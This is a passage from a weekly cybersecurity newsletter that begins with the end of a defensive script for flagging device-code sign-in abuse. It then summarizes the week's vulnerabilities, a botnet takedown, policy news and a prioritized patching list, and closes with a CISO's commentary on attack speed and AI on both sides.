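     "appDisplayName": "Microsoft Office", "authenticationProtocol": "oAuth2",
     "authenticationRequirement": "multiFactorAuthentication"},
]

if __name__ == "__main__":
    print(json.dumps(block_device_code_policy(), indent=2))
    for finding in triage_signins(SAMPLE_SIGNINS):
        print(finding)
```

The second finding is the shape of the attack: MFA satisfied, a first-party client that no human in this organization should be authorizing through a device code, and a source outside the known ranges. Run the triage against the report-only period before flipping the policy to enforced so the genuine Azure CLI and headless-device users are identified and given a scoped exclusion rather than discovering the block the hard way.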
Windows Netlogon CVE-2026-21176: “The New Zerologon” — Pre-Auth, Zero-Click, Domain Controller RCE
A critical Netlogon vulnerability affecting Windows Domain Controllers, requiring only a single specially crafted network packet to achieve system-level code execution with no credentials and no user interaction, was compared by researchers to Zerologon in operational severity. Microsoft patched it in May’s Patch Tuesday; organizations that have not yet updated Domain Controllers remain vulnerable. Domain Controllers are the crown jewels of Windows environments: compromise here enables full forest takeover. Verify patch deployment, confirm Netlogon protections, and ensure SMB and RPC are not externally exposed.
Linux Kernel Privilege Escalation: 19-Year Flaw Now Has Public Exploit
A proof-of-concept exploit is publicly available for the recently disclosed 19-year-old Linux kernel privilege escalation vulnerability. Organizations that delayed patching now face significantly elevated risk. Patch Linux systems immediately across all distributions.
Android Zero-Day CVE-2025-48595: June Security Update
Google’s June Android security update addressed 124 vulnerabilities including CVE-2025-48595, a privilege escalation flaw confirmed under limited active exploitation. Accelerate patch deployment through MDM platforms across all managed Android devices.
Google Security Engineer Charged: Prediction Market Insider Trading via Search Data
Federal prosecutors charged a Google security engineer with fraud and money laundering for allegedly using confidential internal search trend data to place highly profitable prediction market bets on Polymarket, generating over $1 million in cryptocurrency profits. This is not a traditional cyberattack, but it highlights an expanding insider threat vector: insider access can increasingly be monetized through financial instruments, prediction markets, and cryptocurrency ecosystems. Insider risk monitoring programs may need to expand to address these evolving scenarios.
Federal ATG Fuel Monitoring Systems Under Active Attack: Seven Agency Warning
CISA, FBI, NSA, DOE, TSA, EPA, and other agencies jointly warned about active attacks targeting Automatic Tank Gauge systems used at fuel stations, transportation hubs, and chemical facilities, exploiting internet-exposed systems protected only by default passwords. Remove ATG systems from direct internet exposure immediately.
⚖️ Law Enforcement, Policy & Industry
Netherlands Dismantles ASOC Residential Proxy Botnet: 17 Million Devices
Dutch law enforcement dismantled the ASOC residential proxy botnet tied to more than one million infected devices and leveraging over 17 million compromised endpoints globally. Access was sold for five dollars per month for credential stuffing, DDoS, phishing, and proxy services. Residential proxy networks remain valuable because consumer IP traffic appears legitimate to most security controls.
NSA Appoints David Imbordino as Cyber Director, Bruce Jones to CCC
The NSA formally appointed David Imbordino as Cyber Director and Bruce Jones to lead the Cybersecurity Collaboration Center, ending a prolonged leadership gap and restoring continuity for government-private sector cybersecurity partnerships.
Spain Arrests Government Data Hacker
Spanish authorities arrested an individual accused of publishing sensitive information belonging to national police, intelligence personnel, and Spain’s cybersecurity agency. Cybersecurity professionals increasingly face physical-world targeting through doxxing campaigns.
Proposal for Independent U.S. Cyber Force: 30,000 Personnel, $11 Billion
A new policy report recommends creation of a dedicated U.S. Cyber Force. Supporters argue cyber operations have grown large enough to justify their own military branch.
CISA Remains Significantly Understaffed
Homeland Security leadership confirmed CISA is operating with approximately 2,200 employees despite authorization for substantially more. Efforts to rebuild the agency continue during a period of elevated threat activity.
Dragos Acquires Phosphorus: OT and IoT Security Convergence
Dragos announced acquisition of Phosphorus, expanding its ability to secure IoT devices within OT environments reflecting the continued convergence of traditional OT security and connected device management.
Cyera Raises at $12 Billion Valuation
AI security company Cyera is reportedly raising $300 million at a $12 billion valuation on approximately $150 million ARR, reflecting the extraordinary premium investors continue placing on AI security and automation platforms.
✅ This Week’s Priority Action List
Immediate (Do This Now)
Patch Palo Alto GlobalProtect immediately — CISA KEV, June 1 federal deadline, active exploitation confirmed
Patch Apache HTTP Server and Nginx for HTTP/2 Bomb vulnerability — 880,000 potentially affected sites, active exploitation risk
Patch Oracle WebLogic CVE-2024-21182 — CISA KEV, Cobalt Strike and ransomware payloads confirmed
Verify Windows Domain Controller patch deployment for Netlogon CVE-2026-21176 — pre-auth zero-click RCE, “the new Zerologon”
Patch GitLab self-managed instances for Duo AI identity confusion vulnerability immediately
Update or disable WordPress Kirki plugin — CVSS 9.8, one million sites, no credentials required for account takeover
Patch Flowise immediately and restrict import permissions — public exploit enables root access via single malicious import
Revoke and reissue OpenAI Codex credentials if codex-ui-android npm package was present
Patch WinRAR for CVE-2025-8088 — Gamaredon is actively exploiting this for USB worm and wiper deployment
Restrict or disable Microsoft Entra device code authentication flows — Kali365 FBI IC3 warning, active MFA bypass at scale
Patch Linux systems for 19-year privilege escalation vulnerability — public exploit now available
Deploy June Android security updates through MDM for CVE-2025-48595 active exploitation
Short-Term (This Month)
Audit VS Code extensions and restrict untrusted Jupyter notebook execution — GitHub OAuth token theft zero-day has no patch
Rotate cloud and development credentials associated with Red Hat npm Miasma campaign
Hunt for Mustang Panda PlugX indicators across endpoints
Hunt for suspicious Dropbox and OneDrive exfiltration activity in small date-batched increments — five-month stock exchange espionage model
Monitor for Telegram-based outbound C2 traffic and unexpected AWS S3 uploads from endpoints — Gamaredon GammaSteal indicators
Remove ATG fuel monitoring systems from any direct internet exposure
Brief employees on LinkedIn-based intelligence recruitment following Five Eyes joint advisory
Enforce voice phishing verification procedures — Carnival and Charter both started with one phone call
Implement connection limits and HPACK protections on all internet-facing web servers
Review GitHub Actions OIDC trust policies and restrict secrets access from external fork triggers
Patch Redis if self-hosted — CVE-2026-23479 use-after-free, public exploit available
Restrict ASUS router management interfaces to trusted IP ranges until end-of-June patches arrive
Strategic (This Quarter)
Evaluate AI-assisted vulnerability management — Mythos, AI-discovered Redis zero-day, and HTTP/2 Bomb discovery all demonstrate autonomous discovery at operational scale
Expand insider threat monitoring to include financial market abuse, prediction markets, and cryptocurrency monetization scenarios
Accelerate migration to FIDO2 and passkeys — OAuth device code MFA bypass and real-time OTP interception are at industrial scale
Compress vulnerability remediation SLAs for internet-facing systems to match actual exploitation timelines
Review organizational LinkedIn exposure policies and communicate Five Eyes insider recruitment advisory to all staff with sensitive access
Require CVE assignment and public changelog disclosure from all AI vendors with privileged developer environment access
Establish physical social engineering tabletop exercises incorporating front desk, USB device, and visitor management scenarios
🎙️ James Azar’s CISO’s Take
When I look across this week’s four episodes, the defining theme is operational speed and the widening gap between how fast attackers are moving and how fast most organizations are structured to respond. Palo Alto GlobalProtect went from disclosure to CISA KEV with a federal deadline of June 1. Flowise received public root exploit code the same day. The HTTP/2 Bomb can crash major web servers in twenty seconds. The Netlogon vulnerability requires one network packet and no credentials. Against that backdrop, organizations still operating on 30-day patch cycles for internet-facing critical infrastructure are not just behind; they are accepting risk they have not explicitly acknowledged. The fundamentals are the battle. Not dashboards, not AI tools, not frameworks. Patch fast. Detect faster. Train your people. That’s it.
The second major takeaway is that AI has become a fully operational force multiplier on both sides simultaneously. Mythos is autonomously discovering vulnerabilities at a scale no human team can match and is now deployed across NATO, critical infrastructure, and major technology organizations. GreyVibe is using ChatGPT and Gemini throughout its kill chain as operational infrastructure, not experiments. OpenAI’s Codex discovered the HTTP/2 Bomb autonomously. And attackers are selling AI-generated phishing campaigns as subscription services. Security leaders who are still treating AI as a future challenge rather than a present operational reality are working with an incomplete picture of the battlefield they are operating on today.
Stay Cyber Safe. 🔐
📋 Week in Summary
This was the week speed proved itself the defining variable in cybersecurity: not sophistication, not resources, not tooling. The HTTP/2 Bomb crashes servers in twenty seconds. A single Jupyter notebook steals GitHub OAuth tokens before a user closes the window. Gamaredon deployed a USB worm, infostealer, and wiper capability through one WinRAR vulnerability in one coordinated operation. And Carnival’s six million victims trace back to a single voice phishing call against a single employee. The velocity of modern attacks does not leave time for 30-day governance workflows, approval chains, or scheduled patch cycles. The organizations matching attacker speed will survive. The ones that don’t will keep providing the case studies.
The intelligence and human-layer stories this week were equally significant. A Five Eyes joint advisory documented China’s systematic LinkedIn recruitment of government insiders at scale using professional networking platforms as intelligence collection infrastructure. A five-month espionage campaign extracted an executive’s entire strategic communications in small batches designed to be invisible to monitoring systems. A Google security engineer allegedly used privileged access to prediction markets rather than exfiltrating data. These are not technical problems with technical solutions. They are operational, human, and institutional challenges that require awareness programs, monitoring expansion, and cultural change in addition to security tooling. The battlefield has always been both technical and human. This week made that undeniably clear.
Stay informed. Stay prepared. Stay Cyber Safe. 🔐
© CyberHub Podcast | Subscribe on Substack | Watch on YouTube | Follow on LinkedIn